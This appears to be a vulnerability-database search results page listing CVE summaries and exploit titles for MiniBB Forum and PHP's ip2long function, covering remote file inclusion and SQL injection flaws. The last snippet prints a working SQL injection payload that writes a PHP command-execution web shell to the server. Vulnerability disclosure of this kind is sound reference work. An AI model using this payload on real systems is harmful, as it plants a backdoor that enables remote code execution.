172 matches found
CVE-2006-4023
CVE-2006-4023 : The issue concerns the ip2long function in PHP 5.1.4 and earlier, which may incorrectly validate an arbitrary string and return a valid network IP address. This can enable remote attackers to obtain network information and facilitate other attacks, as demonstrated via SQL injectio...
CVE-2006-4023
The ip2long function in PHP 5.1.4 and earlier may incorrectly validate an arbitrary string and return a valid network IP address, which allows remote attackers to obtain network information and facilitate other attacks, as demonstrated using SQL injection in the X-FORWARDED-FOR Header in index.ph...
PHP ip2long() function circumvention
--- PHP ip2long function circumvention -------------------------------------- tested on php 5.0.2 " 4.3.3 -------------------------------------------------------------------------------- after some test on miniBB application http://www.minibb.net/ I obtained that the php ip2long function can be...
CVE-2006-3955
CVE-2006-3955 affects MiniBB Forum 1.5a. The issue is multiple PHP remote file inclusion vulnerabilities allowing an attacker to execute arbitrary PHP code via a URL in the absolute_path parameter to (1) news.php, (2) search.php, or (3) whosOnline.php. The CVSSv2 base score is 7.5 (HIGH) with net...
CVE-2006-3955
Multiple PHP remote file inclusion vulnerabilities in MiniBB Forum 1.5a allow remote attackers to execute arbitrary PHP code via a URL in the absolutepath parameter to 1 news.php, 2 search.php, or 3 whosOnline.php...
MiniBB Forum <= 1.5a Remote File Include Vulnerabilities
--------------------------------------------------------------------------------- MiniBB Forum = 1.5a Remote File Include Vulnerabilities --------------------------------------------------------------------------------- Author : Matdhule Contact : [email protected] Application : MiniBB Forum...
MiniBB Forum <= 1.5a Remote File Include (news.php)
Title : MiniBB Forum = 1.5a Remote File Include news.php Discovered By AG-Spider ----------------------------------------------------------------------------- Affected software description : Application : MiniBB Forum 1.5a news.phpversion : version 1.5 exploit :Remote File Include...
MiniBB Forum <= 1.5a Remote File Include (search.php-whosOnline.php)
Title : MiniBB Forum = 1.5a Remote File Include search.php-whosOnline.php Discovered By :::: AG-Spider & KaBaRa.HaCk .eGy ----------------------------------------------------------------------------- Affected software description : Application : MiniBB Forum 1.5a search.php-whosOnline.phpversion ...
CVE-2006-3690
Multiple PHP remote file inclusion vulnerabilities in MiniBB Forum 1.5a and earlier allow remote attackers to execute arbitrary PHP code via a URL in the absolutepath parameter to 1 components/comminibb.php or 2 components/minibb/index.php...
MiniBB 1.5 - news.php Remote File Inclusion
MiniBB 1.5 - news.php Remote File Inclusion source: https://www.securityfocus.com/bid/19095/info MiniBB is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to include arbitrary remote files containing...
MiniBB 1.5 - 'news.php' Remote File Inclusion
source: https://www.securityfocus.com/bid/19095/info MiniBB is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to include arbitrary remote files containing malicious PHP code and execute it in the context o...
MiniBB-1.5a.txt
--------------------------------------------------------------------------------- MiniBB Forum = 1.5a Remote File Include Vulnerabilities --------------------------------------------------------------------------------- Author : Matdhule Contact : [email protected] Application : MiniBB Forum...
EUVD-2006-3685
Multiple PHP remote file inclusion vulnerabilities in MiniBB Forum 1.5a and earlier allow remote attackers to execute arbitrary PHP code via a URL in the absolutepath parameter to 1 components/comminibb.php or 2 components/minibb/index.php...
CVE-2006-3690
Multiple PHP remote file inclusion vulnerabilities in MiniBB Forum 1.5a and earlier allow remote attackers to execute arbitrary PHP code via a URL in the absolutepath parameter to 1 components/comminibb.php or 2 components/minibb/index.php...
CVE-2006-3690
CVE-2006-3690 : The provided documents describe multiple PHP remote file inclusion vulnerabilities in MiniBB Forum 1.5a and earlier. The flaw allows remote attackers to execute arbitrary PHP code by supplying a crafted URL in the absolute_path parameter to (1) components/com_minibb.php or (2) com...
Mambo Component MiniBB 1.5a - Remote File Inclusion
Mambo Component MiniBB 1.5a - Remote File Inclusion --------------------------------------------------------------------------------------------- MiniBB Forum Mambo Component = 1.5a Remote File Include Vulnerabilities...
MiniBB Mambo Component <= 1.5a Remote File Include Vulnerabilities
No description provided by source. --------------------------------------------------------------------------------------------- MiniBB Forum Mambo Component = 1.5a Remote File Include Vulnerabilities -----------------------------------------------------------------------------------------------...
MiniBB Mambo Component <= 1.5a Remote File Include Vulnerabilities
Exploit for unknown platform in category web applications ================================================================== MiniBB Mambo Component = 1.5a Remote File Include Vulnerabilities ==================================================================...
Mambo Component MiniBB 1.5a - Remote File Inclusion
--------------------------------------------------------------------------------------------- MiniBB Forum Mambo Component = 1.5a Remote File Include Vulnerabilities ----------------------------------------------------------------------------------------------- Author : Ahmad Maulana a.k.a Matdhu...
SQL Injection: miniBB 2.0 RC6b
SQL Injection GET Не фильтруется параметр confirmCode. /index.php?action=confirmpasswd&confirmCode=f' union select '? passthru$GETcmd ?' from mysql.user INTO OUTFILE '/var/www/html/shell.php'/ Не фильтруется параметр post. /index.php?action=delmsg&post=1' union select 1,1 from mysql.user INTO...